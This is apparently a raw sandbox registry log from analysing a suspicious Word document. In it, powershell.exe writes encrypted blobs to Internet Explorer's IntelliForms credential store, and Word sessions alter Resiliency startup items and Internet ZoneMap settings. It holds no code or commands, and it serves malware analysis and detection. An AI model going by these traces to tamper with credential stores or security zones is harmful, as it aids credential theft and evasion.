01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B5000000000200000000001066000000010000200000008AB83367152114BFB978968A2A887E932C1B0CBC5FA12B0EBFF420199436DAEF000000000E80000000020000200000009CEB280309875E3498AA4E986434E2CDCB81151AEB8160D2806D72B8920E05DC90000000DA09946C1AFDBBDDC18F27D3DF62563E3E0B15A955692887E28D6DC0CA086ED41957454AE4C7E398B2C7D4F02EE763DD6A4D799913DB5C303E891E1435CEAB324C89273BD42E88EAED8AC245B41027AE24EAD7CCA8F3587E2224A08778E862991249703AA15B19C6E6292445319EE1C9A7C1E5FAACCF2DFC4544368A10667842657D3E252872F0DD3B77C32966953E574000000009E2A58534844B975724A2852ACA7492AC1C97847298ED3FB734F6A541FC1BC2AD09E4F550F754862DAD359A7CFDA6AB03FF9340D67793948EBACA80CF1655BF
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
E16B48C8A1CFCBA764F142FEBFF8A608F08E1B3001
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B5000000000200000000001066000000010000200000002D42C7E64A946BF5B42ECD2B4F6AB060FFDE84603EAB6109F2E7E5C7F1CEC092000000000E80000000020000200000002DF9E50E594311C7BD5F77F47A4F1B93D965BD3BDD822709BDD567791E1F910D90000000920A2531C16F861DD9B32BB56E659FA2113936338FDEC6A2A66ACD9EF2254CB01584C71C3B0BA4E99B49BB675DD78F24D568F05D3FF157D35E7B866BB3CCAA58D0867682010896925B97E1DCF52695D693470E214F4ECFDA90EB23905B3AA7A7C24A50E8ED4F07C48C96AC9D677927131A8D07B56D3B74999675ADCC70653F293D79D0477F7C6D8DA0AE88AC1F75DF9940000000D9DD33DEB5F331C1090CC149919787105AD3075C4F096143C4FBE728CBBBB7877BE9BD91680E85DB0B38762B7648F34536D3DF494FF9FFCB9D8496A287F179DD
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
1C6C20FFA0A8BC6A180DD8A5004DA830FB5EC84D4A
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B500000000020000000000106600000001000020000000BE2CAE05F70807B41F190D4EFCBECD4F5682A44F80717C01E346B308A088640B000000000E8000000002000020000000B2A9B0B1537B122620C236B48EA1CD6285447FD30D89A6A156ED5658D97C91069000000012EE5D8EA29320BEA1E90964C782C5203C938010E4DF7A7FACF9C39D53D2D659698993B7F9A455D90394ADED90FF44C51B5C55E708A1B75F2E23206CBCF4E26DCF4F140E3EC2F46AAD43A51477CD7AC5AF7E01440EE6867C6251B2A2ED195787417C49CBF6A68B71F1314646B2922B3B3E8E312FC6AA0736CB42EBD043B0E5B75406767495D4960EECFD3D3644A3E37F400000007136F136F6235D5E8F461A5A8D31408C3398C0359EFA9ACB02480B9B83EE30D314C70593D61D5763BBABF343A1AAE42C63E04C55B6B25F91B1956684ABA8F39F
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
1489F923C4DCA729178B3E3233458550D8DDDF2945
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B5000000000200000000001066000000010000200000003FC0F5F2B2FB5CC912A84DA84943F7BF5A4D0FD1C7F8396C35751666BFBA840F000000000E8000000002000020000000A58C9A1EDE05DF1E0E5D4D5A744B4AA41407BC799A247F52A6465B497628B26290000000F3BEA5BF17A81AFA79C0487ADDD06F3409C064DA2685DC57073FA6ED5608E07027937876B3382629F6C92C299CEBE3596CDD152FE6C061B44DBBB97E142EC1CEE3480EE8BDD948A402B72F9118D267B8D86BB32399AB3E3C06F74CB42BFD410106FBAB35AD8DE18AC5A1B8D143AA7009E34D8D0A0E401A595AF0290F87909DDD558B974A97BC829B1157B536A18289F340000000FCB07D9C7002C3962B17560FE040FEB4BCA799178740DD6995DB1ED721D1128DE70C9110B63B9E97877993EC82F08F49855B526944811BCE8525AA962C156A7D
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
1489F923C4DCA729178B3E3233458550D8DDDF2945
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B50000000002000000000010660000000100002000000065CDD53572B1B5FCD329696C41B0DD2344E0BDD9D6B5A678EEFD82F4A27D2AA9000000000E800000000200002000000048F2EF96DC720AD07D8ECB54FA051D2D9337D6854C5999AE8CF0C4623FB1A01590000000A0B5AC63FF2E57EB947CDAF48E348E4678E255EC4C192A1CEEC0425AC156348A9370405CDDC8BE2E4CB19A95D2B23B98715854087B1C9E13ED51B09222C30FA1A34FEFF9F79B5225F254B8BDE36D12A2081F28BA84CCA10F7BEE3C147A855FD6C667BA4021C1503A2BA6ED725EEFDE79B6E671D3CF2CADDF37495A07E84765E50257C202F79E88885581F0B4FB51E299400000001DE5235C545EF0211776EBF7ED9F1FAB694EC7E89590A4E417E9322CFEF87924ED4100E22069B8A708764011429E135A9778A3E7A21D64ED68E6BBA79F92FD14
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
4EC7AEC18D615AE785CC9DF22EE9822AC056E178C5
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B50000000002000000000010660000000100002000000062C0156D62592E670DBE42C5356C5DFEC992049FC2C27AF60A1ECBB62F00AFC0000000000E8000000002000020000000A9A4AFE924309970F0EC91EEF3E47F2F90B29A25247771289DE880DB141205DC90000000A4C96E1D920B56118738F1DDEE0E8C13B55638347180AF1927E70254AD8B3A2107E0D3E487790D69F513382D0986E10BE62AD9965E09930B7EC152614EA41957217C85E1BF9DCEE2F019129F9B24B9EF752A8B2F112A922AD0BAD7C8BB715E928504A034B52731CC22F1352CDF0E1803BF13C851AF42386FD6BFE1677EB81EC028946F22F8D9CFB5503E311816DA33D440000000EBAFFA1372EE896BA6D975209FD44ACC212F77F267BFAB8D60DCDCAB3419EC1E853948CEC7E12599D06F6F024080470C8F08B4DFACC3B6E5F612ACA3EA204B8B
1108
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
1489F923C4DCA729178B3E3233458550D8DDDF2945
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000E377FC6864650743845DE18188A8E6B50000000002000000000010660000000100002000000022E0420BF0EAE2ED60C68BE874D3E22D959561BA1EF3294ACF0A9FEA64172C84000000000E800000000200002000000020D89B37E7276E8F3829B8C81767C2DA08DAAB944C8FD3E5D29A4CE7A977A5B2900000007B898CF74D4760DB7A15131E71DBB24817D3740DCCA5EE1653C8C645521762DA963DE4296781871960E190B82FD9F11BAA5553B2F3F8ADED17A796CA0369AEC35DB6A0F027CF4E5DC386B4B96629B8C4224FA8AFAC7E2EB437E0666C506BB74808CE8CF4B060EEB75B725EEA96E4EE1416F7270765A46344FA600D6595A76ED53E78E4F3D22E6F0A4CA872E292358D1640000000C9369696D14BFC9E8BCD262249AC5B433870F31EDD90A41926204BD442323AF0396A36CAB3AAFF78CE2F14BA70B5EDA6559B29DE6382613EFF45C4A976363338
1764
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
(default)
1764
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency
(default)
1764
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery
(default)
1764
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\13FD02
(default)
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1046
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1042
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
3082
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1031
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1049
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
n,8
6E2C3800E4060000010000000000000000000000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1041
Off
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1055
Off
1764
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1055
On
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1042
On
1764
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage
StemmerFiles_1042
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1764
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1046
On
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
On
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1031
On
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
3082
On
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1041
On
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1049
On
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
E4060000D93CE5B38609D80100000000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6-8
362D3800E406000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2.8
322E3800E406000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
k/8
6B2F3800E406000006000000010000006000000002000000500000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C00660061006D0069006C0069006500730066006500650073002E00720074006600000000000000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 5
[F00000000][T01D3F5CA3470E100][O00000000]*C:\Users\admin\Desktop\charlescase.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 3
[F00000000][T01D26E80939F3400][O00000000]*C:\Users\admin\Desktop\interestedvalues.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 11
[F00000000][T01D3C485C9CAA800][O00000000]*C:\Users\admin\Documents\selectmonitor.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 4
[F00000000][T01D4665A690A1C80][O00000000]*C:\Users\admin\Desktop\materiallas.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 7
[F00000000][T01D6E9A5E90E8E00][O00000000]*C:\Users\admin\Desktop\responseupdates.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 14
[F00000000][T01D346A658A6E800][O00000000]*C:\Users\admin\Documents\customgoods.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D80986B4AFD700][O00000000]*C:\Users\admin\Desktop\familiesfees.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 2
[F00000000][T01D2DF0866754200][O00000000]*C:\Users\admin\Desktop\formsaid.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
018
30313800E406000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 3
[F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 13
[F00000000][T01D478AD45DFA680][O00000000]*C:\Users\admin\Documents\girlsinvestment.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\13FD02
13FD02
04000000E40600002700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00660061006D0069006C0069006500730066006500650073002E0072007400660010000000660061006D0069006C0069006500730066006500650073002E0072007400660000000000010000000000000000B692AD46CED30102FD130002FD130000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D80986B4AFD700][O00000000]*C:\Users\admin\Desktop\
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 10
[F00000000][T01D43515FE6BF200][O00000000]*C:\Users\admin\Documents\poolfederal.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 8
[F00000000][T01D2ADC3FBBD1380][O00000000]*C:\Users\admin\Documents\eggrowth.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 9
[F00000000][T01D578D91B6FEF00][O00000000]*C:\Users\admin\Documents\eventsemail.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 2
[F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 6
[F00000000][T01D6C0E7B5C8F080][O00000000]*C:\Users\admin\Desktop\letloan.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 12
[F00000000][T01D5BC7062EAC980][O00000000]*C:\Users\admin\Documents\nowratings.rtf
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
!18
21313800E406000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
?18
3F313800E406000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
x28
78323800E406000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
h28
68323800E406000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000
1764
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Toolbars\Settings
Microsoft Word
0101000000000000000006000000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
C00010033001000034010000040000001E0000001E0000001E0000001E0000001E0000001E000000220000001E0000001E0000001E000000060000000600000006000000060000000600000000000000060000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000C00000002000000020000000200000002000000000000000000000000000000480000000600000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000000DC000000E25026A1100A0063309006000C000A002D001600000016000000C0030000F501000004060300000000000000000000000000040087010C000600C80009000180FFFF000006000000040000000C0100000502000000000000A004020000001200000000603090000064000000000000FF0000FF000000000000FF01000000010000005C08E0100000000000010000E40400001D000100000000000000020050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D000000000000000000000000D4944600D49446010000002F91010000080A000600000003333296040000000A050C0C0302040600000300000101010606060000000000000000000000000000000000000063631900000001000000000000000000000000000000030000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002100190000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006301190000008C0A00000000E01000004B0000004B0000002000640000006301190000008C0A00000000B01300004B0000004B000000640000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000009002000002000001010101010101000101010101010001010100010001000101010101010101000100020003010301030103000301020003010301030103010000230101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101020101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010301010101010101010101010101FFFFCFFFFFFF00008602FFFF00008602FFFF00000C00FFFF00000100FFFF00000100FFFF0000010061000000610064006D0069006E000000000000000000000087FFFF0300003E00020200000600090034000000000090009000000000000F000000FFFFFF000000000000001400140000000000000002637800C80000000000140000000000900090008000FFFF00000800FFFF00000800FFFF0B00040001002000018014000B0043006F007500720069006500720020004E0065007700018014000B0043006F007500720069006500720020004E0065007700018014000B0043006F007500720069006500720020004E00650077000180140001002000018014000B0043006F007500720069006500720020004E00650077000180140009004D005300200047006F0074006800690063000180150007004D0069006E0067004C0069005500018018000600530069006D00530075006E0001801500050044006F00740075006D00018014000100200001801C0000000000
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
159
1764
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
159
1364
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
(default)
1364
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery
(default)
1364
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency
(default)
1364
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\141404
(default)
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1031
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1042
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1041
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1046
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1049
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
3082
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
t9>
74393E0054050000010000000000000000000000
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1041
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1049
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
3082
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1055
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1031
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1055
Off
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1046
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1042
On
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
?:>
3F3A3E005405000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
54050000BFACC2B78609D80100000000
1364
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage
StemmerFiles_1042
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
k:>
6B3A3E005405000006000000010000005800000002000000480000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C0064006F00670063006C006500610072002E00720074006600000000000000
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1364
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1364
WINWORD.EXE
write
